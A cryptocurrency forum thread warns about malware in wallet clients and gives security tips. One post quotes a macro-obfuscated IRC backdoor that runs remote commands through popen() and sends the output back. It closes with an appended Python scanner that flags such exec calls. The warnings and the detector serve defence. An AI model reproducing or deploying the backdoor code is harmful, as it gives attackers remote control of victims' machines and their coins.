Bitcoin Forum
Author Topic: Beware of Increasingly Sophisticated Malware Infection Attempts  (Read 164421 times)
groggin
August 27, 2015, 08:14:06 PM
 #41

I have also noticed, I was unable to download one of the cryptocurrency cores as it was flagged up as being harmful by norton internet security! This is highly likely with all of the cryptocurrency cores as they are open source which means nothing is protecting them from being hacked and placed onto the cryptocurrency's website in order to attack the computers of many users!

  if programs are open source then you can look at the code yourself, to see whether or not it is malicious. try that with windows or any other closed-source executable

loose the sword that is your pen or tongue [or bittorrent enabled computer] and help fight the so-called new world order   it is the enemy of humanity  |  Sign-up @ Aurovine to get FREE HD music ... and coins!
jackg
August 27, 2015, 08:26:49 PM
 #42

I have also noticed, I was unable to download one of the cryptocurrency cores as it was flagged up as being harmful by norton internet security! This is highly likely with all of the cryptocurrency cores as they are open source which means nothing is protecting them from being hacked and placed onto the cryptocurrency's website in order to attack the computers of many users!

  if programs are open source then you can look at the code yourself, to see whether or not it is malicious. try that with windows or any other closed-source executable

I'm not great at reading binary code: as that is what the .exe extension usually means, is there a better way to read programs?

BitcoinNewsMagazine
August 27, 2015, 08:38:14 PM
 #43

How to keep your home computer malware free.
 
How could it happen?
Clicking a link or attachment in email.
Visiting a website that has malware installed. Depending on your browser settings and what plug-ins you have installed (Flash, Java, Acrobat Reader) malicious software could be installed on your computer without your knowledge.
 
What could happen?
You could lose all the data on your computer.
All the data on your computer could be held for ransom.
Your computer could be used to commit crimes.
Your personal information could be stolen.
Someone could access all of your accounts.
Someone could log everything you type.
Someone could access all the files on your computer.
 
Prevention
Update your operating system and third party applications.
http://secunia.com/vulnerability_scanning/personal/
 
Disable auto run for Plug-Ins
In Google Chrome navigate to chrome://settings/content.
Under Plug-ins select Click to play.
You can add exceptions by going to chrome://settings/content, Plug-ins, and clicking "Manage exceptions..."
 
Use a DNS server that blocks known malicious sites
Symantec https://dns.norton.com/
Comodo https://www.comodo.com/secure-dns/
 
Use Windows Defender on Windows 8 or Microsoft Security Essentials on Windows 7
They are free and effective.
 
Buy and install MalwareBytes Premium and Malware Bytes Anti-Exploit Premium ($25 Each)
 
Be suspicious about links and attachments in emails. Don't click them.
 
Backup your data
Use BitTorrent Sync to sync your data with another computer.
Use an application like Acronis True Image to make a scheduled backup to an external drive. Get two external drives and rotate them regularly. Keep one copy at a different location.
Use a cloud based backup service like Carbonite, Crashplan or Backblaze.
 
Consider replacing your current router with a UTM (Unified Threat Management) firewall that has security software built in. Note that most of these are relatively expensive and require ongoing subscriptions.
Example http://www.asus.com/support/FAQ/1008719/

Be careful with remote access to your PC
Don't use VNC to remotely access your PC. Passwords are easily brute forced via automated scanning scripts. For best security consider two-factor authentication.

Good advice to take to heart, thanks for taking the time to post.

groggin
August 27, 2015, 10:42:49 PM
 #44

I have also noticed, I was unable to download one of the cryptocurrency cores as it was flagged up as being harmful by norton internet security! This is highly likely with all of the cryptocurrency cores as they are open source which means nothing is protecting them from being hacked and placed onto the cryptocurrency's website in order to attack the computers of many users!

  if programs are open source then you can look at the code yourself, to see whether or not it is malicious. try that with windows or any other closed-source executable

I'm not great at reading binary code: as that is what the .exe extension usually means, is there a better way to read programs?

(disclaimer: i am no expert here)
  source code is human readable, you don't have to be a programmer to look at it, neither do you have to fully understand all the nuances of an executable to see if it might be malicious.

 check out github
https://github.com/explore

wean yourself from Windows if you haven't already
i like to dual-boot: when i start my pc i can choose win or lin. i always prefer linux but sometimes i'm stuck with 'doz
open source is awesome
it is the life blood of digital liberty imo.  Cheesy

 
 

jackg
August 28, 2015, 03:14:30 PM
 #45

I have also noticed, I was unable to download one of the cryptocurrency cores as it was flagged up as being harmful by norton internet security! This is highly likely with all of the cryptocurrency cores as they are open source which means nothing is protecting them from being hacked and placed onto the cryptocurrency's website in order to attack the computers of many users!

  if programs are open source then you can look at the code yourself, to see whether or not it is malicious. try that with windows or any other closed-source executable

I'm not great at reading binary code: as that is what the .exe extension usually means, is there a better way to read programs?

(disclaimer: i am no expert here)
  source code is human readable, you don't have to be a programmer to look at it, neither do you have to fully understand all the nuances of an executable to see if it might be malicious.

 check out github
https://github.com/explore

wean yourself from Windows if you haven't already
i like to dual-boot: when i start my pc i can choose win or lin. i always prefer linux but sometimes i'm stuck with 'doz
open source is awesome
it is the life blood of digital liberty imo.  Cheesy

 
 

I do quite like linux, I have a raspberry pi b+ which cannot run a lot of operating systems. Is there a way to change the BIOS so that if I have a certain external hard drive connected then it will run from that? I know it is F2 when started up but I don't want to change the factory settings of my laptop.

cryptocoinex
December 01, 2015, 08:45:22 AM
 #46

Another pretty safe and easy to use program is Deep Freeze.
You can freeze your Windows partition and as soon as you reboot, your PC will go to the state you made when you "freeze" it.
This way no viruses, keyloggers, trojans, RATs, etc. can infect you (as soon as you reboot, the bad stuff is gone).
Downside is that you will have to put the block-chain of any coins you use on the second partition of your hard drive (because you will not be able to update the wallet on the Windows partition).
Magnesium Coin
December 07, 2015, 11:54:54 AM
 #47

Won't Norton Internet Security detect the malware if present on a certain wallet?

I have been using NIS (legally bought, not patched) for a long time. Hope it can detect them.

Also they are updating binaries every time with "Virus Definition Updates".

Can anyone confirm the facts by testing any malicious wallet on a PC with NIS previously installed?
HeroCat
December 16, 2015, 03:22:50 PM
 #48

Well, BTC hardware wallet protection starts to be very complicated, because trojans, worms also are more developed. Only Linux can help, I think  Wink
groggin
December 17, 2015, 01:58:34 PM
 #49

Won't Norton Internet Security detect the malware if present on a certain wallet?

I have been using NIS (legally bought, not patched) for a long time. Hope it can detect them.

Also they are updating binaries every time with "Virus Definition Updates".

Can anyone confirm the facts by testing any malicious wallet on a PC with NIS previously installed?

  malware/virus detectors only foil amateur hackers(period) use sandboxie, and know that some malware can detect being opened in sandboxie... or deep freeze, but the hacker gets your coin anyway ...

 linux is the best bet, go ahead, take the plunge   Cheesy

ipodtouchdud
December 21, 2015, 03:54:53 PM
 #50

I have heard of dead coins.. is this a scam/malware? I would like to know about them before investing in any type of online currency. Thanks!
siameze
January 02, 2016, 04:31:40 PM
 #51

I found this today. Post has since been removed but I managed to screenshot it beforehand and also left negative feedback. A link to the virus total results is included in the feedback.




It wasn't especially sophisticated, nor was it crypted just a basic wallet stealing code that scans PC for private keys. Seems to be targeted at noobs that would get greedy and download without thinking.


BitcoinNewsMagazine
January 02, 2016, 04:48:58 PM
 #52

Well, BTC hardware wallet protection starts to be very complicated, because trojans, worms also are more developed. Only Linux can help, I think  Wink

Just get a Trezor for your bitcoin. Your private keys will then be safe offline and Trezor works with Windows, Linux and OS X 10.8+

helloeverybody
January 02, 2016, 04:53:23 PM
 #53

I found this today. Post has since been removed but I managed to screenshot it beforehand and also left negative feedback. A link to the virus total results is included in the feedback.




It wasn't especially sophisticated, nor was it crypted just a basic wallet stealing code that scans PC for private keys. Seems to be targeted at noobs that would get greedy and download without thinking.

Off topic slightly, but you don't happen to know the name of a program I can use that will scan all my hard disk drives for wallets, do you? Would be handy if it also finds Dash wallets because I've got at least 1 wallet on my HDD somewhere that I've completely lost.

siameze
January 02, 2016, 04:54:01 PM
 #54

Well, BTC hardware wallet protection starts to be very complicated, because trojans, worms also are more developed. Only Linux can help, I think  Wink

Just get a Trezor for your bitcoin. Your private keys will then be safe offline and Trezor works with Windows, Linux and OS X 10.8+

There are clever hacks for a trezor as well, nothing is 100% safe so don't get lulled into a false sense of security. See: http://www.hackinsight.org/news,303.html

Granted, that is a particular version of firmware but as with any device that stores "money" there will always be people looking for the loopholes. A dedicated attacker only needs a small window of time to make your funds vanish.


presstab
January 15, 2016, 05:32:09 AM
 #55

And this is what allegedly brings down Cryptsy...

Projects I Contribute To: libzerocoin | Veil | PIVX | HyperStake | Crown | SaluS
dooglus
January 15, 2016, 05:49:28 AM
 #56

And this is what allegedly brings down Cryptsy...

In the past months, malware infection attempts on this forum have become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans are no longer sufficient to ensure safety.

[...]

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        CFree(buf);
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
    }
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
    FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        pclose(buf);
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
    }
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

But an IRC backdoor would only work on online machines, not cold wallets. Are exchanges still not keeping the majority of their bitcoins offline?

capcher
January 16, 2016, 12:09:17 PM
 #57

But an IRC backdoor would only work on online machines, not cold wallets. Are exchanges still not keeping the majority of their bitcoins offline?

Apparently not Cryptsy. They lost 13,000 BTC and 300,000 LTC because of the Lucky7Coin trojan.
jackg
January 31, 2016, 01:58:26 PM
 #58

There was apparently a coin that had a malicious virus in its client software.
It was AvatarCoin and the wallet tried to duplicate the .dat wallet files onto the scammer's server so that he could take all of the coins from those wallets and sell them.

The avatarcoin scam even included an avatar campaign of 8000AV to every user who joined the campaign and stopped paying around January 8th.

Hippie Tech
aka Amenstop
January 31, 2016, 02:44:55 PM
 #59

But an IRC backdoor would only work on online machines, not cold wallets. Are exchanges still not keeping the majority of their bitcoins offline?

Apparently not Cryptsy. They lost 13,000 BTC and 300,000 LTC because of the Lucky7Coin trojan.

That what you see there is a red herring. Wink
https://en.wikipedia.org/wiki/Red_herring

https://bitcointalk.org/index.php?topic=1173703.msg13729914#msg13729914

Bitcoin_Delivery
February 29, 2016, 05:13:50 PM
 #60

WARNING !! This client is making outbound connections to known malware and/or phishing sites.


http://www.urlquery.net/report.php?id=1434020970582

The "Recent reports on same IP/ASN/Domain" section shows other suspicious sites/links.
https://www.virustotal.com/en/url/946ac3207509fb493eaf2e02e107b97cc03513cb373bb007a8a61b9b6b0fe61c/analysis/1434120962/

Now let's see what the debug.log has to say...
Code:
2015-06-12 12:41:10 connection timeout
2015-06-12 12:41:11 trying connection 77.249.89.46:9748 lastseen=1802.3hrs
2015-06-12 12:41:16 connection timeout
2015-06-12 12:41:17 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:41:22 connection timeout
2015-06-12 12:41:22 trying connection 82.238.124.41:9748 lastseen=33.6hrs
2015-06-12 12:41:27 connection timeout
2015-06-12 12:41:28 trying connection 77.85.35.151:9748 lastseen=170.7hrs
2015-06-12 12:41:33 connection timeout
2015-06-12 12:41:33 trying connection 137.135.57.119:9748 lastseen=27.6hrs
2015-06-12 12:41:38 connection timeout
2015-06-12 12:41:39 trying connection 96.54.4.190:9748 lastseen=21.7hrs
2015-06-12 12:41:44 connection timeout
2015-06-12 12:41:44 trying connection 87.154.210.76:9748 lastseen=378.8hrs
2015-06-12 12:41:49 connection timeout
2015-06-12 12:41:50 trying connection 103.230.107.12:9748 lastseen=2166.3hrs
2015-06-12 12:41:55 connection timeout
2015-06-12 12:41:55 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:42:00 connection timeout
2015-06-12 12:42:01 trying connection 62.157.39.12:9748 lastseen=2675.3hrs
2015-06-12 12:42:06 connection timeout
2015-06-12 12:42:06 trying connection 71.100.135.84:9748 lastseen=16.9hrs
2015-06-12 12:42:11 connection timeout
2015-06-12 12:42:12 trying connection 162.255.117.105:9748 lastseen=52.5hrs
2015-06-12 12:42:17 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:42:22 connection timeout
2015-06-12 12:42:23 trying connection 71.100.135.84:9748 lastseen=16.9hrs
2015-06-12 12:42:28 connection timeout
2015-06-12 12:42:28 trying connection 5.139.143.81:9748 lastseen=3461.6hrs
2015-06-12 12:42:33 connection timeout
2015-06-12 12:42:34 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:42:39 connection timeout
2015-06-12 12:42:39 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:42:44 connection timeout
2015-06-12 12:42:45 trying connection 87.154.214.25:9748 lastseen=2063.7hrs
2015-06-12 12:42:50 connection timeout
************************************************************
2015-06-12 12:42:50 trying connection 104.219.250.234:9748 lastseen=7.2hrs**
************************************************************
2015-06-12 12:42:55 connection timeout
2015-06-12 12:42:56 trying connection 80.57.229.215:9748 lastseen=115.2hrs
2015-06-12 12:43:01 connection timeout
2015-06-12 12:43:01 trying connection 77.232.5.253:9748 lastseen=1191.0hrs

Report for the address, 104.xxx.xxx.234, :
http://www.urlquery.net/report.php?id=1434121818636

And one of its suspicious links/sites :
https://www.virustotal.com/en/url/3b1a7af045bdc8005e8243f65d203df04ba8d43f9e10fd39af1004aad75da0ed/analysis/1434122387/

Then from this screenshot it looks like Geocoin (and then all its clones) has malicious code in it... or am I wrong?
What can we do to inspect the source of coins looking for malicious code and prevent this kind of thing?
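
On the question of inspecting coin source: the backdoor quoted in post #56 hid popen() behind a macro (CRead), so the call site itself never mentions popen. The following is an added example, not code from any poster in this thread; it resolves #define aliases before looking for calls that run external commands. The #define lines in the sample, the function names and the list of flagged calls are assumptions for illustration.

```python
import re

# Calls that run another program or a shell command. In a wallet's
# networking code each one deserves a manual look.
EXEC_FUNCS = {
    "popen", "_popen", "system", "execl", "execlp", "execv", "execvp",
    "execve", "WinExec", "ShellExecuteA", "ShellExecuteW",
    "CreateProcessA", "CreateProcessW",
}

# Object-like macros only: "#define NAME replacement".
DEFINE_RE = re.compile(r"^\s*#\s*define\s+([A-Za-z_]\w*)[ \t]+(.+?)\s*$")
CALL_RE = re.compile(r"\b([A-Za-z_]\w*)\s*\(")
# String and character literals, blanked so their contents are not scanned.
LITERAL_RE = re.compile(r'"(?:\\.|[^"\\])*"|\'(?:\\.|[^\'\\])*\'')


def clean(line):
    """Blank out literals, then drop a trailing // comment."""
    return LITERAL_RE.sub('""', line).split("//", 1)[0]


def collect_macros(lines):
    """Map each object-like macro name to its replacement text."""
    macros = {}
    for line in lines:
        m = DEFINE_RE.match(line)
        if m:
            macros[m.group(1)] = m.group(2)
    return macros


def resolve(name, macros):
    """Follow alias chains (A -> B -> popen); stop on a cycle."""
    seen = set()
    while name in macros and name not in seen:
        seen.add(name)
        name = macros[name]
    return name


def find_exec_calls(source):
    """Return (line_no, name_as_written, resolved_name) per exec-style call."""
    lines = [clean(raw) for raw in source.splitlines()]
    macros = collect_macros(lines)
    findings = []
    for line_no, line in enumerate(lines, start=1):
        for m in CALL_RE.finditer(line):
            written = m.group(1)
            resolved = resolve(written, macros)
            if resolved in EXEC_FUNCS:
                findings.append((line_no, written, resolved))
    return findings


# Constructed sample: the four #define lines are assumed from the post's
# "macros resolved" listing; the body is abridged from the quoted code.
SAMPLE = r'''#define CBuff "PRIVMSG"
#define CLine FILE
#define CRead popen
#define CFree pclose
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        CFree(buf);
    }
}
'''

if __name__ == "__main__":
    for line_no, written, resolved in find_exec_calls(SAMPLE):
        note = "hidden behind a macro" if written != resolved else "direct call"
        print(f"line {line_no}: {written}() -> {resolved}() [{note}]")
```

A hit only marks a line for manual review; block comments and token pasting are not handled.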